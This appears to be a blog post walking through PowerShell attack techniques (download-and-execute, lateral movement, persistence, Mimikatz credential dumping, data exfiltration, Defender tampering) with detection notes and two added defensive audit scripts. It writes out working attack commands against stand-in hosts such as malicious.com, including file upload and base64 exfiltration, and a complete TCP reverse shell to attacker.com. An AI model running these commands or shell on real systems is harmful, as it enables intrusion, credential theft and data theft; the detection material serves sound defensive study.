Leveraging PowerShell During Exploitation
Attackers lean on PowerShell during exploitation because it ships with every supported Windows version, runs as a Microsoft-signed binary, and exposes the full .NET runtime, so malicious activity blends in with routine administration ("living off the land"). Here are several methods and techniques for using PowerShell during exploitation:
1. Initial Access and Reconnaissance
a. Download and Execute Malicious Scripts:
Attackers can use PowerShell to download and execute scripts from remote servers. The two-step form below writes the script to disk first, which leaves an artifact for antivirus and file-monitoring tools; -ExecutionPolicy Bypass only overrides the policy for that one process, since execution policy is not a security boundary.
Invoke-WebRequest -Uri http://malicious.com/malware.ps1 -OutFile C:\Windows\Temp\malware.ps1
powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\malware.ps1
b. Gathering System Information:
PowerShell can be used to gather detailed information about the target system: PowerShell version and host, running processes, installed services, and hardware and domain membership. Get-CimInstance is the supported cmdlet on current systems; Get-WmiObject is its legacy equivalent and was removed in PowerShell 7.
Get-Host
Get-Process
Get-Service
Get-CimInstance -ClassName Win32_ComputerSystem
2. Lateral Movement
a. Remote Command Execution:
PowerShell Remoting can execute commands on remote systems if the attacker has valid credentials. It requires WinRM to be enabled on the target and the account to be a local administrator or a member of Remote Management Users; the session is authenticated with Kerberos (or NTLM) and appears on the target as a wsmprovhost.exe process.
Invoke-Command -ComputerName RemotePC -ScriptBlock { Get-Process }
b. Using PsExec via PowerShell:
PsExec (Sysinternals) allows remote command execution and can be launched from PowerShell like any other executable. It copies a service binary to the target's ADMIN$ share and registers a temporary service, which is noisy (System log Event ID 7045, service installation); passing the password with -p also exposes it to process command-line logging.
Start-Process -FilePath "PsExec.exe" -ArgumentList "\\RemotePC -u User -p Password cmd.exe"
3. Persistence
a. Creating Scheduled Tasks:
Attackers can use PowerShell to create scheduled tasks that execute malicious payloads. A task survives reboots and can run as another account; registering it under a different user requires administrator rights and that user's credentials. Creation is recorded in Microsoft-Windows-TaskScheduler/Operational (Event ID 106) and, when object-access auditing is enabled, Security Event ID 4698.
$Action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-ExecutionPolicy Bypass -File C:\Windows\Temp\malicious.ps1'
$Trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName 'UpdateTask' -User 'Administrator' -Password 'password'
b. Modifying Registry for Persistence:
PowerShell can be used to modify the Windows registry to achieve persistence. The HKCU Run key needs no elevation and runs the value at that user's next logon; Sysmon Event ID 13 (registry value set) and Autoruns both surface this kind of entry.
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Windows\Temp\malicious.exe'
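The two persistence locations above are also the first places a responder checks. The following audit script is an added example, not code from the original post: it enumerates Run/RunOnce values for the current user and the machine plus every scheduled task action, and flags entries that launch from a user-writable directory or invoke PowerShell with typical evasion switches. The path and command patterns are assumptions for illustration, not a vendor rule set; run it in an elevated session so HKLM and all tasks are readable.

```powershell
# Added example (not from the original post): audit Run keys and scheduled
# tasks for the persistence patterns described above. Heuristic only; the
# two regexes below are assumptions, tune them for your environment.
$SuspiciousPathPattern = '\\(Windows\\Temp|Users\\[^\\]+\\AppData|ProgramData|Temp)\\'
$SuspiciousCmdPattern  = 'powershell|pwsh|-enc|-e |bypass|iex|invoke-expression|downloadstring|hidden'

function Get-RunKeyEntries {
    # Autorun registry values for the current user and the machine.
    $keys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, PSDrive, ...
            [pscustomobject]@{
                Source  = $key
                Name    = $p.Name
                Command = [string]$p.Value
            }
        }
    }
}

function Get-ScheduledTaskEntries {
    # One row per task action; Execute plus Arguments is what actually runs.
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }       # COM-handler actions have no Execute
            [pscustomobject]@{
                Source  = "Task $($task.TaskPath)$($task.TaskName) (RunAs: $($task.Principal.UserId))"
                Name    = $task.TaskName
                Command = ("{0} {1}" -f $a.Execute, $a.Arguments).Trim()
            }
        }
    }
}

function Test-SuspiciousAutorun {
    param([Parameter(Mandatory)][string]$Command)
    # Flag entries launched from a user-writable location or that start
    # PowerShell with evasion-style switches (-enc, bypass, hidden, iex, ...).
    ($Command -match $SuspiciousPathPattern) -or ($Command -match $SuspiciousCmdPattern)
}

$entries = @(Get-RunKeyEntries) + @(Get-ScheduledTaskEntries)
$entries |
    Where-Object { Test-SuspiciousAutorun -Command $_.Command } |
    Format-Table -AutoSize -Wrap Source, Name, Command
```

Both examples from the section above (a task running PowerShell.exe against C:\Windows\Temp\malicious.ps1, and a Run value pointing at C:\Windows\Temp\malicious.exe) match on the path pattern alone. Expect some legitimate hits from installers under ProgramData; the point is a short review list, not a verdict.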
4. Credential Dumping
a. Using Mimikatz:
Attackers can use PowerShell to download and execute Mimikatz, a tool for extracting credentials from LSASS memory. Reading LSASS requires local administrator rights (SeDebugPrivilege), and a Mimikatz binary written to disk is reliably caught by Defender signatures, which is why attackers more often load it in memory instead; either way, an LSASS handle opened from an unexpected process is a high-value detection.
Invoke-WebRequest -Uri http://malicious.com/mimikatz.exe -OutFile C:\Windows\Temp\mimikatz.exe
Start-Process -FilePath C:\Windows\Temp\mimikatz.exe
5. Data Exfiltration
a. Uploading Files to a Remote Server:
PowerShell can be used to upload files to an attacker's server. With -InFile, Invoke-RestMethod streams the raw file bytes as the request body; it does not build a multipart form, so the content type should describe the raw body (the receiving endpoint must be written to accept it).
$FilePath = "C:\sensitive_data.txt"
$Server = "http://malicious.com/upload"
Invoke-RestMethod -Uri $Server -Method Post -InFile $FilePath -ContentType "application/octet-stream"
b. Encoding and Sending Data:
Attackers can encode sensitive data and send it to a remote server. Base64 is encoding, not encryption: it defeats naive keyword matching but the content is trivially recoverable from a packet capture or proxy log. Get-Content -Raw is used so the whole file is encoded as one string rather than an array of lines.
$Data = Get-Content "C:\sensitive_data.txt" -Raw
$EncodedData = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Data))
Invoke-RestMethod -Uri "http://malicious.com/receive" -Method Post -Body $EncodedData
6. Bypassing Security Mechanisms
a. Bypassing Execution Policy:
PowerShell scripts can be executed even if the execution policy is Restricted. Microsoft documents execution policy as a safety feature against accidental script execution, not a security boundary: any user can override it per process (-ExecutionPolicy Bypass), pipe script text into the interpreter, or pass it as -EncodedCommand. Controls that actually constrain PowerShell are Constrained Language Mode under an application-control policy (WDAC or AppLocker) and AMSI.
powershell.exe -ExecutionPolicy Bypass -File malicious.ps1
b. Disabling Antivirus and Windows Defender:
Attackers can disable security features using PowerShell. Both commands below require administrator rights, and on Windows 10 (1903 and later) and Windows 11 with Tamper Protection enabled they fail: Set-MpPreference is not allowed to turn off real-time monitoring and the WinDefend service cannot be stopped. A successful attempt is logged as Microsoft-Windows-Windows Defender/Operational Event ID 5001 (real-time protection disabled), and the Set-MpPreference -DisableRealtimeMonitoring string itself is a well-known script-block detection.
Set-MpPreference -DisableRealtimeMonitoring $true
Stop-Service -Name WinDefend
7. Creating Reverse Shells
a. PowerShell Reverse Shell:
Attackers can create a reverse shell to control the target system remotely. The snippet below is the widely circulated PowerShell TCP reverse shell (the same pattern as Nishang's Invoke-PowerShellTcp): it connects out to attacker.com:4444, reads a line of text, runs it with Invoke-Expression and sends back the output with a fake prompt. The channel is plaintext, and the combination of TCPClient, GetStream and iex is flagged by AMSI and Script Block Logging on patched systems unless obfuscated.
$client = New-Object System.Net.Sockets.TCPClient('attacker.com', 4444)  # connect out to the listener
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}  # 64 KB receive buffer
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){  # loop until the listener closes the socket
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)  # received bytes -> command text
$sendback = (iex $data 2>&1 | Out-String )  # run the command, capturing output and errors
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '  # append a prompt showing the current directory
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
By leveraging PowerShell, attackers can perform a wide range of malicious activities, from initial reconnaissance to data exfiltration. Defenders should enable Script Block Logging (Event ID 4104), Module Logging and transcription, forward the Microsoft-Windows-PowerShell/Operational log to a SIEM, remove or disable PowerShell 2.0 (which predates AMSI and script-block logging), and enforce Constrained Language Mode through application control so that the techniques above are visible and, where possible, blocked.
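To make the monitoring concrete, here is an added example (not code from the original post) that enables Script Block Logging through the same registry value the Group Policy setting writes, scores the logged script text (Event ID 4104) against indicators taken from the techniques in this post, and first runs that scoring over three constructed sample script blocks so the logic can be exercised offline. The indicator list and the scoring threshold are assumptions for illustration, not a vendor rule set.

```powershell
# Added example (not from the original post): enable Script Block Logging
# and scan Event ID 4104 for the patterns used throughout this post.
# Enabling the policy needs an elevated shell; the scan needs read access to
# the Microsoft-Windows-PowerShell/Operational log. Indicators are assumptions.

function Enable-ScriptBlockLogging {
    # Same value the "Turn on PowerShell Script Block Logging" GPO sets.
    $path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    Set-ItemProperty -Path $path -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

# Indicators drawn from the sections above: download cradles, in-memory
# execution, defence tampering, credential theft and the TCP reverse shell.
$Indicators = @(
    'Invoke-WebRequest', 'DownloadString', 'DownloadFile', 'Net\.WebClient',
    'Invoke-Expression', '\biex\b', 'FromBase64String', '-EncodedCommand',
    'Set-MpPreference', 'DisableRealtimeMonitoring', 'Stop-Service.*WinDefend',
    'mimikatz', 'sekurlsa',
    'Net\.Sockets\.TCPClient', 'GetStream\(\)', 'Invoke-RestMethod.*-InFile'
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText)
    # Return the matched indicators so an analyst sees why it fired.
    $hits = foreach ($i in $Indicators) { if ($ScriptText -match $i) { $i } }
    [pscustomobject]@{
        Suspicious = [bool]$hits
        Score      = @($hits).Count
        Indicators = @($hits)
    }
}

function Get-SuspiciousScriptBlockEvents {
    param([int]$MaxEvents = 500, [int]$MinScore = 2)
    # 4104 = "Creating Scriptblock text". Properties[2] is the script text,
    # Properties[3] the ScriptBlockId (long blocks are split across events).
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text    = [string]$_.Properties[2].Value
            $result  = Test-SuspiciousScriptBlock -ScriptText $text
            if ($result.Score -ge $MinScore) {
                $preview = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time          = $_.TimeCreated
                    ScriptBlockId = $_.Properties[3].Value
                    Score         = $result.Score
                    Indicators    = ($result.Indicators -join ', ')
                    Preview       = $preview.Substring(0, [Math]::Min(120, $preview.Length))
                }
            }
        }
}

# Constructed samples (not real telemetry) to show the scoring offline:
# a benign query, a download cradle, and the Defender-tampering commands.
$Samples = @(
    "Get-Service | Where-Object Status -eq 'Running'",
    'IEX (New-Object Net.WebClient).DownloadString("http://malicious.com/malware.ps1")',
    "Set-MpPreference -DisableRealtimeMonitoring `$true; Stop-Service -Name WinDefend"
)
foreach ($s in $Samples) {
    $r = Test-SuspiciousScriptBlock -ScriptText $s
    '{0,-5} score={1} [{2}]  {3}' -f $r.Suspicious, $r.Score, ($r.Indicators -join ','), $s
}

# Live scan (uncomment; events appear for sessions started after enabling).
# Enable-ScriptBlockLogging
# Get-SuspiciousScriptBlockEvents | Format-Table -AutoSize -Wrap
```

The benign sample scores 0 and the other two score 3 each, which is why the live scan defaults to a minimum score of 2: a single indicator such as Invoke-WebRequest is common in legitimate administration, while two or more together rarely are. Note that PowerShell 5 and later already writes 4104 events at Warning level for script blocks containing known-suspicious terms even before the policy is enabled, so the live query returns something on most hosts; enabling the policy makes it log every block.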
Note: Blog based on publicly available information.